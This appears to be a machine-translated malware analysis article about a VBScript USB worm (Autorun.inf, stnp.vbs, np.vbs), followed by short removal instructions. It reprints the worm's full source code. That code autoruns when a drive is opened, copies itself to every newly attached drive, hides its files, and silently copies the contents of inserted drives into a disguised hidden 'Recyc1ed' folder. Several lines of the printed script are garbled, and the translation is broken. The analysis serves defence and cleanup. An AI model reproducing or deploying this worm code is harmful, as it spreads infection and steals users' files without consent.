Latest malicious replication virus Autorun.inf,stnp.vbs,np.vbs
Two methods of code analysis and virus processing
Method one: From the fingers of the light dance
The biggest feature of this virus is that after poisoning, automatically infect your hard drive root directory and copy virus files. Whether you double-click, or right to choose to open, or run the Resource Manager will automatically run its code (virus), so in this virus, novice often hit the opening character, resulting in data can not read.
The following is a code analysis of the virus three of the total is very simple, has been added annotation.
FileName: Autorun.inf
Copy Code code as follows:
[Autorun]
open=
Shell\open= Open (&o)
Shell\open\command=wscript.exe Stnp.vbs
Shell\open\default=1
Shell\explore= Resource Manager (&X)
Shell\explore\command=wscript.exe Stnp.vbs
FileName: stnp.vbs
The function is to detect whether the np.vbs exists and to run
Copy Code code as follows:
On Error Resume Next
Set fso = CreateObject ("Scripting.filesys" & "Temobject")
If FSO. FileExists ("np.vbs") =-1 Then
If FSO. FileExists ("d:\NP.vbs") =-1 Then
Set F = Fso.getfile ("D:\NP.vbs")
If f.attributes = 0 Then
Else
F.attributes = 0
End If
F.delete (True)
End If
Fso.copyfile "Np.vbs", "D:\NP.vbs", True
Set WshShell = WScript.CreateObject ("Wscript.Shell")
Wshshell.run "D:\NP.vbs"
End If
FileName: Np.vbs
-----
Copy Code code as follows:
' [Natruepark]
' Fault tolerant statements
On Error Resume Next
' Variable declaration and initialization
Dim fso, Old_drs (), New_drs (), Old_n, New_n, New_yn, WshShell
Set fso = CreateObject ("Scripting.file" & "SystemObject")
Set WshShell = WScript.CreateObject ("Wscript.Shell")
Old_n=0
ReDim Old_drs (Old_n)
Old_drs (0) = "C"
' [Main part]
Wshshell.run ("Explorer. \")
Dim i
i = 0
Do While I>=0 and i<8*360
Scan_disk ()
If Judge_new_disk () = 1 Then
Dim left_n
Left_n = 1
Do While left_n<= (New_n-old_n)
New_disk = New_drs (left_n+old_n) & ": \"
'-----------------< maintenance block >-----------------
If FSO. FileExists (new_disk& "np.vbs") =-1 Then
Else
Self_copy (New_disk)
End If
Add_attrib (new_disk& "Np.vbs")
If FSO. FileExists (new_disk& "autorun.inf") =-1 Then
Del_attrib (new_disk& "Autorun.inf")
End If
Add_autorun (New_disk)
Add_attrib (new_disk& "Autorun.inf")
If FSO. FileExists (new_disk& "stnp.vbs") =-1 Then
Else
ADD_STNP (New_disk)
End If
Add_attrib (new_disk& "Stnp.vbs")
'-----------------</maintenance block >-----------------
'-----------------< function block >-----------------
Dim rec
rec = "d:\Recyc1ed\"
If FSO. FolderExists (REC) =-1 Then
Else
Fso.createfolder (REC)
End If
ADD_ATTRIBF (REC)
If FSO. FileExists (rec& "desktop.ini") =-1 Then
Else
Add_desktop (REC)
End If
Add_attrib (rec& "Desktop.ini")
Aim_folder = Rec&date () &rnd ()
If FSO. FolderExists (Aim_folder) =-1 Then
Else
Fso.createfolder (Aim_folder)
End If
' Find the Steam Turbine principle folder and copy '
If FSO. FolderExists (new_disk& "Principle of the turbine") =-1 Then
Fso.copyfolder new_disk& "Principle of the turbine", Aim_folder, True
ADD_ATTRIBF (Aim_folder)
End If
' Universal replication
If Old_n = 0 Then
Else
Set fp = Fso.getfolder (New_drs (new_n) & ": \")
Set FC = FP. Subfolders
For each F in FC
Fso.copyfolder f& "", aim_folder& "\" &f.name, True
Next
Set FC = Fp.files
For each F in FC
Fso.copyfile f& "", aim_folder& "\", True
Next
ADD_ATTRIBF (Aim_folder)
End If
'-----------------</function block >-----------------
Left_n=left_n+1
Loop
Copy_disk ()
End If
Wscript.Sleep (10000)
I=i+1
Loop
' [function section]
' Available drive detection New_drs (), New_n
function Scan_disk ()
Dim d, Dr
New_n =-1
Set Dr = Fso.drives
For each d in DR
If D.isready Then
New_n=new_n+1
ReDim Preserve New_drs (New_n)
New_drs (new_n) =d.driveletter
End If
Next
End Function
' Determine if there is a new drive to join
function Judge_new_disk ()
If new_n = Old_n Then
Judge_new_disk = 0
ElseIf New_n < Old_n Then
ReDim Preserve Old_drs (New_n)
Old_n = New_n
Judge_new_disk = 0
ElseIf new_n > Old_n Then
ReDim Preserve Old_drs (New_n)
Judge_new_disk = 1
End If
End Function
' Copy new drive form
function Copy_disk ()
Dim n
N=0
Do While N<=new_n
Old_drs (n) = New_drs (n)
N=n+1
Loop
Old_n = New_n
End Function
' Add specified file properties
function Add_attrib (file)
Set F = fso.getfile (file)
If f.attributes = 7 Then
Else
F.attributes = 7
End If
End Function
' Delete the specified file properties
function Del_attrib (file)
Set F = fso.getfile (file)
If f.attributes = 7 Then
F.attributes = 0
Else
End If
End Function
' Self-copying to the specified file directory
function Self_copy (folder)
Dim Aim_path, Mid_path, Self_file, Mid_file
Aim_path = folder& "Np.vbs"
Mid_path = "C:\np.bin"
Set self_file = Fso.opentextfile (wscript.scriptfullname,1)
Self = Self_file.readall
Set mid_file = Fso.opentextfile (mid_path,2,true)
Mid_file.write Self
Mid_file.close
Set mid_file = Fso.getfile (Mid_path)
Mid_file.copy (Aim_path)
Mid_file.delete (True)
End Function
' Increase Autorun.inf
function Add_autorun (folder)
Dim path
Path = folder& "Autorun.inf"
Set temp = FSO. CreateTextFile ("C:\a.bin", True)
Temp.writeline "[Autorun]"
Temp.writeline "Open="
Temp.writeline "shell\open= Open (&o)"
Temp.writeline "Shell\open\command=wscript.exe Stnp.vbs"
Temp.writeline "Shell\open\default=1"
Temp.writeline "shell\explore= Resource Manager (&X)"
Temp.writeline "Shell\explore\command=wscript.exe Stnp.vbs"
Temp.close
Set cop = Fso.getfile ("C:\a.bin")
Cop.copy (PATH)
Cop.delete (True)
End Function
' Increase Desktop.ini
function Add_desktop (folder)
Dim path
Path = folder& "Desktop.ini"
Set temp = FSO. CreateTextFile ("C:\d.bin", True)
Temp.writeline "[. ShellClassInfo] "
Temp.writeline "clsid={645ff040-5081-101b-9f08-00aa002f954e}"
Temp.close
Set cop = Fso.getfile ("C:\d.bin")
Cop.copy (PATH)
Cop.delete (True)
End Function
' Increase Stnp.vbs
function ADD_STNP (folder)
Dim path
Set fso = CreateObject ("Scripting.file" & "SystemObject")
Path = folder& "Stnp.vbs"
Set temp = FSO. CreateTextFile ("C:\s.bin", True)
Temp.writeline "On Error Resume Next"
Temp.writeline "Set fso = CreateObject (" &CHR "&" Scripting.filesys "&CHR (+) &" & "&CHR (34) & "Temobject" &CHR (+) & ")"
Temp.writeline "If fso." FileExists ("&CHR" & "Np.vbs" &CHR (+) & ") =-1 Then"
Temp.writeline "If fso." FileExists ("&CHR" & "D:\NP.vbs" &CHR (+) & ") =-1 Then"
Temp.writeline "Set F = Fso.getfile (" &CHR "&" D:\NP.vbs "&CHR () &") "
Temp.writeline "If f.attributes = 0 Then"
Temp.writeline "Else"
Temp.writeline "f.attributes = 0"
Temp.writeline "End If"
Temp.writeline "F.delete (True)"
Temp.writeline "End If"
Temp.writeline "Fso.copyfile" &CHR & "Np.vbs" &CHR (a) & ", &CHR (a) &" D:\NP.vbs "&CHR ( & ", True"
Temp.writeline "Set WshShell = WScript.CreateObject (" &chr) & "Wscript.Shell" &CHR (%) & ")"
Temp.writeline "Wshshell.run" &CHR & "D:\NP.vbs" &CHR (34)
Temp.writeline "End If"
Temp.close
Set cop = Fso.getfile ("C:\s.bin")
Cop.copy (PATH)
Cop.delete (True)
End Function
' Add specified folder properties
function ADD_ATTRIBF (folder)
Set F = Fso.getfolder (folder)
If f.attributes = 7 Then
Else
F.attributes = 7
End If
End Function
' Delete the specified folder properties
function DEL_ATTRIBF (folder)
Set F = Fso.getfolder (folder)
If f.attributes = 0 Then
Else
F.attributes = 0
End If
End Function
WScript.Echo ("THANK you!!")
Wscript.Quit
The virus seems to have a conscience will not infect C disk, so the solution is still some: open the C disk with Explorer, then expand the other letter on the left, in the tool-folder-View remove the hidden protected system files hook and choose to view all files. Remove each of the three files that are hidden from each letter and reboot.
Method Two: The author has just successfully manipulated
Only need to enter WinPE, find Np.vbs can even stnp.vbs all investigate, delete these demons, you can!!!
